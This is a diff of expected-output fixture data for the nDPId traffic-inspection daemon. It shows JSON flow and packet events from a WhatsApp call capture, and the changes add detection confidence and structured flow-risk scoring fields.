 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1432582296339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACafE8AAEAR0VrAqAIEHw1KMM46DZYAhr8lAAMAaiESpEIAAMYoECn4BPzbT0BAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa1VQAAEAReFXAqAIEHw1KMM46DZYAhr8lAAMAaiESpEIAAMYoECn4BPzbT0BAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1432582296339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaPWIAAEARBkjAqAIEHw1UMM46DZYAhgQrAAMAaiESpEIAAPM63M4iUJ72Oh1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa4JwAAEARYw3AqAIEHw1UMM46DZYAhgQrAAMAaiESpEIAAPM63M4iUJ72Oh1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1432582296389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582296389,"pkt":"APS5Jrv0xiwDYGpkCABFAABItbcAAFYRcAQfDV0wwKgCBA2WzjoANObxAQMAGCESpEIAABQXleBLNAVxhWEAIAAIAAG2aW4xsYdAAgAIAAABTYyPEzk="}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1432582296441,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582296441,"pkt":"APS5Jrv0xiwDYGpkCABFAABIu\/4AAFIRdr0fDVQwwKgCBA2WzjoANKRaAQMAGCESpEIAAPM63M4iUJ72Oh0AIAAIAAG2aW4xsYdAAgAIAAABTYyPE2E="}
@@ -245,118 +245,118 @@
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1432582296565,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582296565,"pkt":"APS5Jrv0xiwDYGpkCABFAABID4sAAFMRJqEfDU\/AwKgCBA2WzjoANNk2AQMAGCESpEIAAL9\/1m08YXkuT0YAIAAIAAG2aW4xsYdAAgAIAAABTYyPE58="}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1432582303186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582303186,"pkt":"xiwDYGpkAPS5Jrv0CABFwABI\/ugAAEARW8\/AqAIEAcJav846yg8ANOnpAAEAGCESpEL3EVgs34UDSm8ZSi0ACAAUBo8N2M5l\/vTJutWmGJeHW1ycL5M="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303186,"flow_last_seen":1432582303186,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582303186,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1432582303300,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582303300,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIibwAAEARIT7AqAIEW\/2wQc46JcEANNm\/AAEAGCESpEJqJ0QlQ7N3HdICmh0ACAAUdy+mbVoXRYBrOj7VSucZjRXX5oc="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582303300,"flow_last_seen":1432582303300,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582303300,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1432582303604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582303604,"pkt":"APS5Jrv0xiwDYGpkCABFAABI2uIAAC8R4ddb\/bBBwKgCBCXBzjoANGAJAAEAGCESpEIU61RZ3ZsVVlL2qyQACAAUqmIWy0WW07d7nJ5APIsHCVUVL7g="}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1432582303607,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582303607,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIbOUAAEARPhXAqAIEW\/2wQc46JcEANIk8AQEAGCESpEIU61RZ3ZsVVlL2qyQACAAU6CFWVCyx0lHi4kItE160ER18SxI="}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1432582303831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582303831,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIdWcAAEAR5VDAqAIEAcJav846yg8ANHIiAAEAGCESpEJT9nMzid0wAn5OIFYACAAUj7UY3ZixJKF1uir6vHE5QBib28w="}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":985,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1432582304464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582304464,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIRQUAAEARFbPAqAIEAcJav846yg8ANIW7AAEAGCESpEIZoNpuKgJFUxs+kVcACAAURUHG5kUyySWGpYslvS2cuO+ddv8="}
 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1432582306376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1432582306376,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIS5VYAAEARDTTAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1196,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1432582322995,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1196,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582322995,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1196,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1432582322995,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1196,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582322995,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1432582324191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582324191,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIJmQAAEARzfDAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582331561,"flow_last_seen":1432582331561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582331561,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1432582331561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582331561,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAowcFAAEAGFpTAqAIEEaeOJ8AtAbtkgHfvejCYYFAR\/\/+cbwAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1432582331698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582331698,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xwAAO0GcDgRp44nwKgCBAG7wC16MJhgZIB38FARn\/78bwAA"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582331825,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo40dAAEAG9Q3AqAIEEaeOJ8AtAbtkgHfwejCYYVAQ\/\/6cbwAA"}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582246280,"flow_last_seen":1432582306376,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1506,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267970,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267971,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267972,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238792,"flow_last_seen":1432582267975,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582336425,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
